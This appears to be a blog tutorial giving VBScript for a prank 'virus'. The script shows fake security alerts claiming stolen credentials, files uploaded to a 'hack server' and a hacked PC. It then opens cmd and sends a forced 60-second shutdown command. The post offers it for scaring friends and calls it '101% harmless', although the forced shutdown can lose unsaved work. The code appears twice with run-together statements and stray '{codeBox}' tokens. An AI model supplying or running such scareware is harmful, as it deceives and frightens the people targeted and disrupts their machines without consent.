Hey guys! In this post, I will share that 'How I made a Harmless multifunctional virus'! Isn't crazy!! In the previous post, I have shown you that 'How to make a harmless virus'. But it was actually a pop-up box that shows a message repeatedly. Or you can say it is part-2 of it. This virus shows multi pop-up box which shows some messages like 'Your PC is at risk', 'Your computer is hacked by Vector X', 'Your PC needs a restart!', etc. And we will also add a function that when all the pop-up boxes end! Then it will open 'cmd (Command Prompt)' and automatically shut down the computer after 60 seconds. But need not worry! We just need to type 'shutdown -a' and the shutdown will be prevented or abort. These all things will give this virus a real virus look! Your friends can totally get worried 😯! This virus is 101% harmless. So, let's see the process of creating it.
DISCLAIMER:- This is not a harmful virus. This is not at all related to Hacking stuff. So let's continue...
Process of it
Explanation
VIRUS code:-X=MsgBox("Error while opening this file, do you want us to fix the problem?",4+64,"Error (0x6437SG73)")X=MsgBox("Unable to fix the issue. Do you want us to scan your Computer?",3+48,"Windows Security Alert!")X=MsgBox("Threat has been detected. Do you want to delete this program?",3+16,"Threat Found! Action needed") X=MsgBox("Unable to delete this threat",1+64,"Critical Error") X=MsgBox("Virus is Activated",2+16,"Virus Alert") X=MsgBox("Deleting System Files..",2+16,"File Deletion") X=MsgBox("Copying your credentials",2+48,"Virus Alert")X=MsgBox("Please wait. Uploading your files to hack server. Do you want to stop it?",4+64,"Transfering files....")X=MsgBox("Can not stop.Access is denied. File transfer Completed",1+16,"Completed") X=MsgBox("Your computer is hacked by vector x",1+68,"Error (0x64GBHSG73)") X=MsgBox("Your PC ran into a problem and needs to restart :(",1+48,"Firewall Alert!")
set shellobj = CreateObject("WScript.Shell")shellobj.run "cmd"
wscript.sleep 2000shellobj.sendkeys "shutdown -s -f -t 60"shellobj.sendkeys "{ENTER}" {codeBox}
X=MsgBox("Error while opening this file, do you want us to fix the problem?",4+64,"Error (0x6437SG73)")X=MsgBox("Unable to fix the issue. Do you want us to scan your Computer?",3+48,"Windows Security Alert!")X=MsgBox("Threat has been detected. Do you want to delete this program?",3+16,"Threat Found! Action needed")X=MsgBox("Unable to delete this threat",1+64,"Critical Error")X=MsgBox("Virus is Activated",2+16,"Virus Alert")X=MsgBox("Deleting System Files..",2+16,"File Deletion")X=MsgBox("Copying your credentials",2+48,"Virus Alert")X=MsgBox("Please wait. Uploading your files to hack server. Do you want to stop it?",4+64,"Transfering files....")X=MsgBox("Can not stop.Access is denied. File transfer Completed",1+16,"Completed")X=MsgBox("Your computer is hacked by vector x",1+68,"Error (0x64GBHSG73)")X=MsgBox("Your PC ran into a problem and needs to restart :(",1+48,"Firewall Alert!")set shellobj = CreateObject("WScript.Shell")shellobj.run "cmd"wscript.sleep 2000shellobj.sendkeys "shutdown -s -f -t 60"shellobj.sendkeys "{ENTER}" {codeBox}

0 Comments